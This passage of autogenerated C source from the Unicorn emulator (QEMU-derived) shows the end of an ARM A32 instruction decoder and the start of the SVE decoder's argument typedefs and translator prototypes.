&u.f_rrr)) return true; return false; } return false; case 0x00800020: /* ....0110 110..... ........ ..11.... */ disas_a32_extract_rrr_rot(ctx, &u.f_rrr_rot, insn); switch (insn & 0x001003c0) { case 0x00000040: /* ....0110 1100.... ......00 0111.... 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:487 */ if (trans_UXTAB16(ctx, &u.f_rrr_rot)) return true; return false; } return false; case 0x00a00000: /* ....0110 111..... ........ ..01.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:477 */ disas_a32_extract_sat(ctx, &u.f_sat, insn); if (trans_USAT(ctx, &u.f_sat)) return true; return false; case 0x00a00020: /* ....0110 111..... ........ ..11.... */ switch (insn & 0x001003c0) { case 0x00000040: /* ....0110 1110.... ......00 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:488 */ disas_a32_extract_rrr_rot(ctx, &u.f_rrr_rot, insn); if (trans_UXTAB(ctx, &u.f_rrr_rot)) return true; return false; case 0x00000300: /* ....0110 1110.... ......11 0011.... */ disas_a32_extract_sat16(ctx, &u.f_sat, insn); switch ((insn >> 10) & 0x3) { case 0x3: /* ....0110 1110.... ....1111 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:480 */ if (trans_USAT16(ctx, &u.f_sat)) return true; return false; } return false; case 0x00100040: /* ....0110 1111.... ......00 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:489 */ disas_a32_extract_rrr_rot(ctx, &u.f_rrr_rot, insn); if (trans_UXTAH(ctx, &u.f_rrr_rot)) return true; return false; case 0x00100300: /* ....0110 1111.... ......11 0011.... */ disas_a32_extract_rdm(ctx, &u.f_rr, insn); switch (insn & 0x000f0c00) { case 0x000f0c00: /* ....0110 11111111 ....1111 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:495 */ if (trans_RBIT(ctx, &u.f_rr)) return true; return false; } return false; case 0x00100380: /* ....0110 1111.... ......11 1011.... */ disas_a32_extract_rdm(ctx, &u.f_rr, insn); switch (insn & 0x000f0c00) { case 0x000f0c00: /* ....0110 11111111 ....1111 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:494 */ if (trans_REVSH(ctx, &u.f_rr)) return true; return false; } return false; } return false; } return false; case 0x01000000: /* ....0111 .0...... ........ ...0.... */ disas_a32_extract_ldst_rs_p1w(ctx, &u.f_ldst_rr, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....0111 .0.0.... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:285 */ if (trans_STR_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x1: /* ....0111 .0.1.... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:290 */ if (trans_LDR_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; case 0x01000010: /* ....0111 .0...... ........ ...1.... */ switch (insn & 0x00a00060) { case 0x00000000: /* ....0111 000..... ........ .001.... */ switch (insn & 0x00100080) { case 0x00000000: /* ....0111 0000.... ........ 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:501 */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); if (trans_SMLAD(ctx, &u.f_rrrr)) return true; return false; case 0x00100000: /* ....0111 0001.... ........ 0001.... */ disas_a32_extract_rdmn(ctx, &u.f_rrr, insn); switch ((insn >> 12) & 0xf) { case 0xf: /* ....0111 0001.... 1111.... 0001.... 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:506 */ if (trans_SDIV(ctx, &u.f_rrr)) return true; return false; } return false; } return false; case 0x00000020: /* ....0111 000..... ........ .011.... */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch (insn & 0x00100080) { case 0x00000000: /* ....0111 0000.... ........ 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:502 */ if (trans_SMLADX(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x00000040: /* ....0111 000..... ........ .101.... */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch (insn & 0x00100080) { case 0x00000000: /* ....0111 0000.... ........ 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:503 */ if (trans_SMLSD(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x00000060: /* ....0111 000..... ........ .111.... */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch (insn & 0x00100080) { case 0x00000000: /* ....0111 0000.... ........ 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:504 */ if (trans_SMLSDX(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x00200000: /* ....0111 001..... ........ .001.... */ disas_a32_extract_rdmn(ctx, &u.f_rrr, insn); switch (insn & 0x0010f080) { case 0x0010f000: /* ....0111 0011.... 1111.... 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:507 */ if (trans_UDIV(ctx, &u.f_rrr)) return true; return false; } return false; case 0x00800000: /* ....0111 100..... ........ .001.... */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch (insn & 0x00100080) { case 0x00000000: /* ....0111 1000.... ........ 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:409 */ if (trans_USADA8(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x00a00040: /* ....0111 101..... ........ .101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:414 */ disas_a32_extract_bfx(ctx, &u.f_bfx, insn); if (trans_SBFX(ctx, &u.f_bfx)) return true; return false; } return false; case 0x01400000: /* ....0111 .1...... ........ ...0.... */ disas_a32_extract_ldst_rs_p1w(ctx, &u.f_ldst_rr, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....0111 .1.0.... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:287 */ if (trans_STRB_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x1: /* ....0111 .1.1.... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:292 */ if (trans_LDRB_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; case 0x01400010: /* ....0111 .1...... ........ ...1.... */ switch (insn & 0x00a00060) { case 0x00000000: /* ....0111 010..... ........ .001.... */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch (insn & 0x00100080) { case 0x00000000: /* ....0111 0100.... ........ 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:509 */ if (trans_SMLALD(ctx, &u.f_rrrr)) return true; return false; case 0x00100000: /* ....0111 0101.... ........ 0001.... 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:514 */ if (trans_SMMLA(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x00000020: /* ....0111 010..... ........ .011.... */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch (insn & 0x00100080) { case 0x00000000: /* ....0111 0100.... ........ 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:510 */ if (trans_SMLALDX(ctx, &u.f_rrrr)) return true; return false; case 0x00100000: /* ....0111 0101.... ........ 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:515 */ if (trans_SMMLAR(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x00000040: /* ....0111 010..... ........ .101.... */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch (insn & 0x00100080) { case 0x00000000: /* ....0111 0100.... ........ 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:511 */ if (trans_SMLSLD(ctx, &u.f_rrrr)) return true; return false; case 0x00100080: /* ....0111 0101.... ........ 1101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:516 */ if (trans_SMMLS(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x00000060: /* ....0111 010..... ........ .111.... */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch (insn & 0x00100080) { case 0x00000000: /* ....0111 0100.... ........ 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:512 */ if (trans_SMLSLDX(ctx, &u.f_rrrr)) return true; return false; case 0x00100080: /* ....0111 0101.... ........ 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:517 */ if (trans_SMMLSR(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x00800000: /* ....0111 110..... ........ .001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:418 */ disas_a32_extract_disas_a32_Fmt_42(ctx, &u.f_bfi, insn); if (trans_BFCI(ctx, &u.f_bfi)) return true; return false; case 0x00a00040: /* ....0111 111..... ........ .101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:415 */ disas_a32_extract_bfx(ctx, &u.f_bfx, insn); if (trans_UBFX(ctx, &u.f_bfx)) return true; return false; case 0x00a00060: /* ....0111 111..... ........ .111.... */ disas_a32_extract_disas_a32_Fmt_16(ctx, &u.f_empty, insn); switch (insn & 0xf0100080) { case 0xe0100080: /* 11100111 1111.... ........ 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:422 */ if (trans_UDF(ctx, &u.f_empty)) return true; return false; } return false; } return false; } return false; case 0x4: /* ....100. ........ ........ ........ */ disas_a32_extract_disas_a32_Fmt_48(ctx, &u.f_ldst_block, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....100. ...0.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:521 */ if (trans_STM(ctx, &u.f_ldst_block)) return true; return false; case 0x1: /* ....100. ...1.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:522 */ if (trans_LDM_a32(ctx, &u.f_ldst_block)) return true; return false; } return false; case 0x5: /* ....101. ........ ........ ........ 
*/
        disas_a32_extract_branch(ctx, &u.f_i, insn);
        switch ((insn >> 24) & 0x1) {
        case 0x0:
            /* ....1010 ........ ........ ........ */
            /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:529 */
            if (trans_B(ctx, &u.f_i)) return true;
            return false;
        case 0x1:
            /* ....1011 ........ ........ ........ */
            /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:530 */
            if (trans_BL(ctx, &u.f_i)) return true;
            return false;
        }
        return false;
    case 0x7:
        /* ....111. ........ ........ ........ */
        disas_a32_extract_disas_a32_Fmt_50(ctx, &u.f_i, insn);
        switch ((insn >> 24) & 0x1) {
        case 0x1:
            /* ....1111 ........ ........ ........ */
            /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:534 */
            if (trans_SVC(ctx, &u.f_i)) return true;
            return false;
        }
        return false;
    }
    return false;
}

unicorn-2.1.1/qemu/target/arm/decode-sve.inc.c
/* This file is autogenerated by scripts/decodetree.py. */

typedef struct { int esz; int imm1; int imm2; int rd; } arg_disas_sve25;
typedef struct { int esz; int imm; int rd; int rm; } arg_disas_sve26;
typedef struct { int imm; int rd; } arg_disas_sve27;
typedef struct { int rd; int rn; } arg_disas_sve28;
typedef struct { int dbm; int rd; } arg_disas_sve29;
typedef struct { int esz; int h; int rd; int rn; int u; } arg_disas_sve30;
typedef struct { int pg; int rn; } arg_disas_sve31;
typedef struct {
#ifdef _MSC_VER
    int dummy;
#endif
} arg_disas_sve32;
typedef struct { int rd; } arg_disas_sve33;
typedef struct { int pg; int rd; int s; } arg_disas_sve34;
typedef struct { int rn; } arg_disas_sve35;
typedef struct { int ne; int rm; int rn; int sf; } arg_disas_sve36;
typedef struct { int eq; int esz; int rd; int rm; int rn; int sf; int u; } arg_disas_sve37;
typedef struct { int esz; int imm; int rd; } arg_disas_sve38;
typedef struct { int ra; int rd; int rm; int rn; int sz; int u; } arg_disas_sve39;
typedef struct { int index; int ra; int rd; int rm; int rn; int sz; int u; } arg_disas_sve40;
typedef struct { int esz; int pg; int rd; int rm; int rn; int rot; } arg_disas_sve41;
typedef struct { int esz; int pg; int ra; int rd; int rm; int rn; int rot; } arg_disas_sve42;
typedef struct { int esz; int index; int ra; int rd; int rm; int rn; int rot; } arg_disas_sve43;
typedef struct { int esz; int index; int ra; int rd; int rm; int rn; int sub; } arg_disas_sve44;
typedef struct { int esz; int index; int rd; int rm; int rn; } arg_disas_sve45;
typedef struct { int esz; int imm; int rd; int rm; int rn; } arg_disas_sve46;
typedef struct { int rm; } arg_disas_sve47;
typedef struct { int d; int esz; int imm; int pat; int rd; int rn; int u; } arg_incdec2_cnt;
typedef struct { int d; int esz; int pg; int rd; int rn; int u; } arg_incdec2_pred;
typedef struct { int d; int esz; int imm; int pat; int rd; int u; }
arg_incdec_cnt; typedef struct { int d; int esz; int pg; int rd; int u; } arg_incdec_pred; typedef struct { int esz; int pat; int rd; int s; } arg_ptrue; typedef struct { int esz; int pg; int rd; int rn; } arg_rpr_esz; typedef struct { int pg; int rd; int rn; int s; } arg_rpr_s; typedef struct { int esz; int imm; int pg; int rd; int rn; } arg_rpri_esz; typedef struct { int esz; int ff; int imm; int msz; int pg; int rd; int rn; int u; } arg_rpri_gather_load; typedef struct { int dtype; int imm; int nreg; int pg; int rd; int rn; } arg_rpri_load; typedef struct { int esz; int imm; int msz; int pg; int rd; int rn; } arg_rpri_scatter_store; typedef struct { int esz; int imm; int msz; int nreg; int pg; int rd; int rn; } arg_rpri_store; typedef struct { int esz; int pg; int rd; int rm; int rn; } arg_rprr_esz; typedef struct { int esz; int ff; int msz; int pg; int rd; int rm; int rn; int scale; int u; int xs; } arg_rprr_gather_load; typedef struct { int dtype; int nreg; int pg; int rd; int rm; int rn; } arg_rprr_load; typedef struct { int pg; int rd; int rm; int rn; int s; } arg_rprr_s; typedef struct { int esz; int msz; int pg; int rd; int rm; int rn; int scale; int xs; } arg_rprr_scatter_store; typedef struct { int esz; int msz; int nreg; int pg; int rd; int rm; int rn; } arg_rprr_store; typedef struct { int esz; int pg; int ra; int rd; int rm; int rn; } arg_rprrr_esz; typedef struct { int dbm; int rd; int rn; } arg_rr_dbm; typedef struct { int esz; int rd; int rn; } arg_rr_esz; typedef struct { int imm; int rd; int rn; } arg_rri; typedef struct { int esz; int imm; int rd; int rn; } arg_rri_esz; typedef struct { int esz; int rd; int rm; int rn; } arg_rrr_esz; typedef struct { int imm; int rd; int rm; int rn; } arg_rrri; typedef arg_rprr_esz arg_ORR_zpzz; static bool trans_ORR_zpzz(DisasContext *ctx, arg_ORR_zpzz *a); typedef arg_rprr_esz arg_EOR_zpzz; static bool trans_EOR_zpzz(DisasContext *ctx, arg_EOR_zpzz *a); typedef arg_rprr_esz arg_AND_zpzz; static bool trans_AND_zpzz(DisasContext *ctx, arg_AND_zpzz *a); typedef arg_rprr_esz arg_BIC_zpzz; static bool trans_BIC_zpzz(DisasContext *ctx, arg_BIC_zpzz *a); typedef arg_rprr_esz arg_ADD_zpzz; static bool trans_ADD_zpzz(DisasContext *ctx, arg_ADD_zpzz *a); typedef arg_rprr_esz arg_SUB_zpzz; static bool trans_SUB_zpzz(DisasContext *ctx, arg_SUB_zpzz *a); typedef arg_rprr_esz arg_SMAX_zpzz; static bool trans_SMAX_zpzz(DisasContext *ctx, arg_SMAX_zpzz *a); typedef arg_rprr_esz arg_UMAX_zpzz; static bool trans_UMAX_zpzz(DisasContext *ctx, arg_UMAX_zpzz *a); typedef arg_rprr_esz arg_SMIN_zpzz; static bool trans_SMIN_zpzz(DisasContext *ctx, arg_SMIN_zpzz *a); typedef arg_rprr_esz arg_UMIN_zpzz; static bool trans_UMIN_zpzz(DisasContext *ctx, arg_UMIN_zpzz *a); typedef arg_rprr_esz arg_SABD_zpzz; static bool trans_SABD_zpzz(DisasContext *ctx, arg_SABD_zpzz *a); typedef arg_rprr_esz arg_UABD_zpzz; static bool trans_UABD_zpzz(DisasContext *ctx, arg_UABD_zpzz *a); typedef arg_rprr_esz arg_MUL_zpzz; static bool trans_MUL_zpzz(DisasContext *ctx, arg_MUL_zpzz *a); typedef arg_rprr_esz arg_SMULH_zpzz; static bool trans_SMULH_zpzz(DisasContext *ctx, arg_SMULH_zpzz *a); typedef arg_rprr_esz arg_UMULH_zpzz; static bool trans_UMULH_zpzz(DisasContext *ctx, arg_UMULH_zpzz *a); typedef arg_rprr_esz arg_SDIV_zpzz; static bool trans_SDIV_zpzz(DisasContext *ctx, arg_SDIV_zpzz *a); typedef arg_rprr_esz arg_UDIV_zpzz; static bool trans_UDIV_zpzz(DisasContext *ctx, arg_UDIV_zpzz *a); typedef arg_rpr_esz arg_ORV; static bool trans_ORV(DisasContext *ctx, arg_ORV *a); typedef 
arg_rpr_esz arg_EORV; static bool trans_EORV(DisasContext *ctx, arg_EORV *a); typedef arg_rpr_esz arg_ANDV; static bool trans_ANDV(DisasContext *ctx, arg_ANDV *a); typedef arg_rpr_esz arg_MOVPRFX_z; static bool trans_MOVPRFX_z(DisasContext *ctx, arg_MOVPRFX_z *a); typedef arg_rpr_esz arg_MOVPRFX_m; static bool trans_MOVPRFX_m(DisasContext *ctx, arg_MOVPRFX_m *a); typedef arg_rpr_esz arg_UADDV; static bool trans_UADDV(DisasContext *ctx, arg_UADDV *a); typedef arg_rpr_esz arg_SADDV; static bool trans_SADDV(DisasContext *ctx, arg_SADDV *a); typedef arg_rpr_esz arg_SMAXV; static bool trans_SMAXV(DisasContext *ctx, arg_SMAXV *a); typedef arg_rpr_esz arg_UMAXV; static bool trans_UMAXV(DisasContext *ctx, arg_UMAXV *a); typedef arg_rpr_esz arg_SMINV; static bool trans_SMINV(DisasContext *ctx, arg_SMINV *a); typedef arg_rpr_esz arg_UMINV; static bool trans_UMINV(DisasContext *ctx, arg_UMINV *a); typedef arg_rpri_esz arg_ASR_zpzi; static bool trans_ASR_zpzi(DisasContext *ctx, arg_ASR_zpzi *a); typedef arg_rpri_esz arg_LSR_zpzi; static bool trans_LSR_zpzi(DisasContext *ctx, arg_LSR_zpzi *a); typedef arg_rpri_esz arg_LSL_zpzi; static bool trans_LSL_zpzi(DisasContext *ctx, arg_LSL_zpzi *a); typedef arg_rpri_esz arg_ASRD; static bool trans_ASRD(DisasContext *ctx, arg_ASRD *a); typedef arg_rprr_esz arg_ASR_zpzz; static bool trans_ASR_zpzz(DisasContext *ctx, arg_ASR_zpzz *a); typedef arg_rprr_esz arg_LSR_zpzz; static bool trans_LSR_zpzz(DisasContext *ctx, arg_LSR_zpzz *a); typedef arg_rprr_esz arg_LSL_zpzz; static bool trans_LSL_zpzz(DisasContext *ctx, arg_LSL_zpzz *a); typedef arg_rprr_esz arg_ASR_zpzw; static bool trans_ASR_zpzw(DisasContext *ctx, arg_ASR_zpzw *a); typedef arg_rprr_esz arg_LSR_zpzw; static bool trans_LSR_zpzw(DisasContext *ctx, arg_LSR_zpzw *a); typedef arg_rprr_esz arg_LSL_zpzw; static bool trans_LSL_zpzw(DisasContext *ctx, arg_LSL_zpzw *a); typedef arg_rpr_esz arg_CLS; static bool trans_CLS(DisasContext *ctx, arg_CLS *a); typedef arg_rpr_esz arg_CLZ; static bool trans_CLZ(DisasContext *ctx, arg_CLZ *a); typedef arg_rpr_esz arg_CNT_zpz; static bool trans_CNT_zpz(DisasContext *ctx, arg_CNT_zpz *a); typedef arg_rpr_esz arg_CNOT; static bool trans_CNOT(DisasContext *ctx, arg_CNOT *a); typedef arg_rpr_esz arg_NOT_zpz; static bool trans_NOT_zpz(DisasContext *ctx, arg_NOT_zpz *a); typedef arg_rpr_esz arg_FABS; static bool trans_FABS(DisasContext *ctx, arg_FABS *a); typedef arg_rpr_esz arg_FNEG; static bool trans_FNEG(DisasContext *ctx, arg_FNEG *a); typedef arg_rpr_esz arg_ABS; static bool trans_ABS(DisasContext *ctx, arg_ABS *a); typedef arg_rpr_esz arg_NEG; static bool trans_NEG(DisasContext *ctx, arg_NEG *a); typedef arg_rpr_esz arg_SXTB; static bool trans_SXTB(DisasContext *ctx, arg_SXTB *a); typedef arg_rpr_esz arg_UXTB; static bool trans_UXTB(DisasContext *ctx, arg_UXTB *a); typedef arg_rpr_esz arg_SXTH; static bool trans_SXTH(DisasContext *ctx, arg_SXTH *a); typedef arg_rpr_esz arg_UXTH; static bool trans_UXTH(DisasContext *ctx, arg_UXTH *a); typedef arg_rpr_esz arg_SXTW; static bool trans_SXTW(DisasContext *ctx, arg_SXTW *a); typedef arg_rpr_esz arg_UXTW; static bool trans_UXTW(DisasContext *ctx, arg_UXTW *a); typedef arg_rprr_esz arg_FCMGE_ppzz; static bool trans_FCMGE_ppzz(DisasContext *ctx, arg_FCMGE_ppzz *a); typedef arg_rprr_esz arg_FCMGT_ppzz; static bool trans_FCMGT_ppzz(DisasContext *ctx, arg_FCMGT_ppzz *a); typedef arg_rprr_esz arg_FCMEQ_ppzz; static bool trans_FCMEQ_ppzz(DisasContext *ctx, arg_FCMEQ_ppzz *a); typedef arg_rprr_esz arg_FCMNE_ppzz; static bool 
trans_FCMNE_ppzz(DisasContext *ctx, arg_FCMNE_ppzz *a); typedef arg_rprr_esz arg_FCMUO_ppzz; static bool trans_FCMUO_ppzz(DisasContext *ctx, arg_FCMUO_ppzz *a); typedef arg_rprr_esz arg_FACGE_ppzz; static bool trans_FACGE_ppzz(DisasContext *ctx, arg_FACGE_ppzz *a); typedef arg_rprr_esz arg_FACGT_ppzz; static bool trans_FACGT_ppzz(DisasContext *ctx, arg_FACGT_ppzz *a); typedef arg_rprrr_esz arg_MLA; static bool trans_MLA(DisasContext *ctx, arg_MLA *a); typedef arg_rprrr_esz arg_MLS; static bool trans_MLS(DisasContext *ctx, arg_MLS *a); typedef arg_rrr_esz arg_ADD_zzz; static bool trans_ADD_zzz(DisasContext *ctx, arg_ADD_zzz *a); typedef arg_rrr_esz arg_SUB_zzz; static bool trans_SUB_zzz(DisasContext *ctx, arg_SUB_zzz *a); typedef arg_rrr_esz arg_SQADD_zzz; static bool trans_SQADD_zzz(DisasContext *ctx, arg_SQADD_zzz *a); typedef arg_rrr_esz arg_UQADD_zzz; static bool trans_UQADD_zzz(DisasContext *ctx, arg_UQADD_zzz *a); typedef arg_rrr_esz arg_SQSUB_zzz; static bool trans_SQSUB_zzz(DisasContext *ctx, arg_SQSUB_zzz *a); typedef arg_rrr_esz arg_UQSUB_zzz; static bool trans_UQSUB_zzz(DisasContext *ctx, arg_UQSUB_zzz *a); typedef arg_rrr_esz arg_AND_zzz; static bool trans_AND_zzz(DisasContext *ctx, arg_AND_zzz *a); typedef arg_rrr_esz arg_ORR_zzz; static bool trans_ORR_zzz(DisasContext *ctx, arg_ORR_zzz *a); typedef arg_rrr_esz arg_EOR_zzz; static bool trans_EOR_zzz(DisasContext *ctx, arg_EOR_zzz *a); typedef arg_rrr_esz arg_BIC_zzz; static bool trans_BIC_zzz(DisasContext *ctx, arg_BIC_zzz *a); typedef arg_disas_sve25 arg_INDEX_ii; static bool trans_INDEX_ii(DisasContext *ctx, arg_INDEX_ii *a); typedef arg_disas_sve26 arg_INDEX_ir; static bool trans_INDEX_ir(DisasContext *ctx, arg_INDEX_ir *a); typedef arg_rri_esz arg_INDEX_ri; static bool trans_INDEX_ri(DisasContext *ctx, arg_INDEX_ri *a); typedef arg_rrr_esz arg_INDEX_rr; static bool trans_INDEX_rr(DisasContext *ctx, arg_INDEX_rr *a); typedef arg_rri arg_ADDVL; static bool trans_ADDVL(DisasContext *ctx, arg_ADDVL *a); typedef arg_rri arg_ADDPL; static bool trans_ADDPL(DisasContext *ctx, arg_ADDPL *a); typedef arg_disas_sve27 arg_RDVL; static bool trans_RDVL(DisasContext *ctx, arg_RDVL *a); typedef arg_rri_esz arg_ASR_zzi; static bool trans_ASR_zzi(DisasContext *ctx, arg_ASR_zzi *a); typedef arg_rri_esz arg_LSR_zzi; static bool trans_LSR_zzi(DisasContext *ctx, arg_LSR_zzi *a); typedef arg_rri_esz arg_LSL_zzi; static bool trans_LSL_zzi(DisasContext *ctx, arg_LSL_zzi *a); typedef arg_rrr_esz arg_ASR_zzw; static bool trans_ASR_zzw(DisasContext *ctx, arg_ASR_zzw *a); typedef arg_rrr_esz arg_LSR_zzw; static bool trans_LSR_zzw(DisasContext *ctx, arg_LSR_zzw *a); typedef arg_rrr_esz arg_LSL_zzw; static bool trans_LSL_zzw(DisasContext *ctx, arg_LSL_zzw *a); typedef arg_rrri arg_ADR_s32; static bool trans_ADR_s32(DisasContext *ctx, arg_ADR_s32 *a); typedef arg_rrri arg_ADR_u32; static bool trans_ADR_u32(DisasContext *ctx, arg_ADR_u32 *a); typedef arg_rrri arg_ADR_p32; static bool trans_ADR_p32(DisasContext *ctx, arg_ADR_p32 *a); typedef arg_rrri arg_ADR_p64; static bool trans_ADR_p64(DisasContext *ctx, arg_ADR_p64 *a); typedef arg_disas_sve28 arg_MOVPRFX; static bool trans_MOVPRFX(DisasContext *ctx, arg_MOVPRFX *a); typedef arg_rr_esz arg_FEXPA; static bool trans_FEXPA(DisasContext *ctx, arg_FEXPA *a); typedef arg_rrr_esz arg_FTSSEL; static bool trans_FTSSEL(DisasContext *ctx, arg_FTSSEL *a); typedef arg_incdec_cnt arg_CNT_r; static bool trans_CNT_r(DisasContext *ctx, arg_CNT_r *a); typedef arg_incdec_cnt arg_INCDEC_r; static bool 
trans_INCDEC_r(DisasContext *ctx, arg_INCDEC_r *a); typedef arg_incdec_cnt arg_SINCDEC_r_32; static bool trans_SINCDEC_r_32(DisasContext *ctx, arg_SINCDEC_r_32 *a); typedef arg_incdec_cnt arg_SINCDEC_r_64; static bool trans_SINCDEC_r_64(DisasContext *ctx, arg_SINCDEC_r_64 *a); typedef arg_incdec2_cnt arg_INCDEC_v; static bool trans_INCDEC_v(DisasContext *ctx, arg_INCDEC_v *a); typedef arg_incdec2_cnt arg_SINCDEC_v; static bool trans_SINCDEC_v(DisasContext *ctx, arg_SINCDEC_v *a); typedef arg_rr_dbm arg_ORR_zzi; static bool trans_ORR_zzi(DisasContext *ctx, arg_ORR_zzi *a); typedef arg_rr_dbm arg_EOR_zzi; static bool trans_EOR_zzi(DisasContext *ctx, arg_EOR_zzi *a); typedef arg_rr_dbm arg_AND_zzi; static bool trans_AND_zzi(DisasContext *ctx, arg_AND_zzi *a); typedef arg_disas_sve29 arg_DUPM; static bool trans_DUPM(DisasContext *ctx, arg_DUPM *a); typedef arg_rpri_esz arg_FCPY; static bool trans_FCPY(DisasContext *ctx, arg_FCPY *a); typedef arg_rpri_esz arg_CPY_m_i; static bool trans_CPY_m_i(DisasContext *ctx, arg_CPY_m_i *a); typedef arg_rpri_esz arg_CPY_z_i; static bool trans_CPY_z_i(DisasContext *ctx, arg_CPY_z_i *a); typedef arg_rrri arg_EXT; static bool trans_EXT(DisasContext *ctx, arg_EXT *a); typedef arg_rr_esz arg_DUP_s; static bool trans_DUP_s(DisasContext *ctx, arg_DUP_s *a); typedef arg_rri arg_DUP_x; static bool trans_DUP_x(DisasContext *ctx, arg_DUP_x *a); typedef arg_rrr_esz arg_INSR_f; static bool trans_INSR_f(DisasContext *ctx, arg_INSR_f *a); typedef arg_rrr_esz arg_INSR_r; static bool trans_INSR_r(DisasContext *ctx, arg_INSR_r *a); typedef arg_rr_esz arg_REV_v; static bool trans_REV_v(DisasContext *ctx, arg_REV_v *a); typedef arg_rrr_esz arg_TBL; static bool trans_TBL(DisasContext *ctx, arg_TBL *a); typedef arg_disas_sve30 arg_UNPK; static bool trans_UNPK(DisasContext *ctx, arg_UNPK *a); typedef arg_rrr_esz arg_ZIP1_p; static bool trans_ZIP1_p(DisasContext *ctx, arg_ZIP1_p *a); typedef arg_rrr_esz arg_ZIP2_p; static bool trans_ZIP2_p(DisasContext *ctx, arg_ZIP2_p *a); typedef arg_rrr_esz arg_UZP1_p; static bool trans_UZP1_p(DisasContext *ctx, arg_UZP1_p *a); typedef arg_rrr_esz arg_UZP2_p; static bool trans_UZP2_p(DisasContext *ctx, arg_UZP2_p *a); typedef arg_rrr_esz arg_TRN1_p; static bool trans_TRN1_p(DisasContext *ctx, arg_TRN1_p *a); typedef 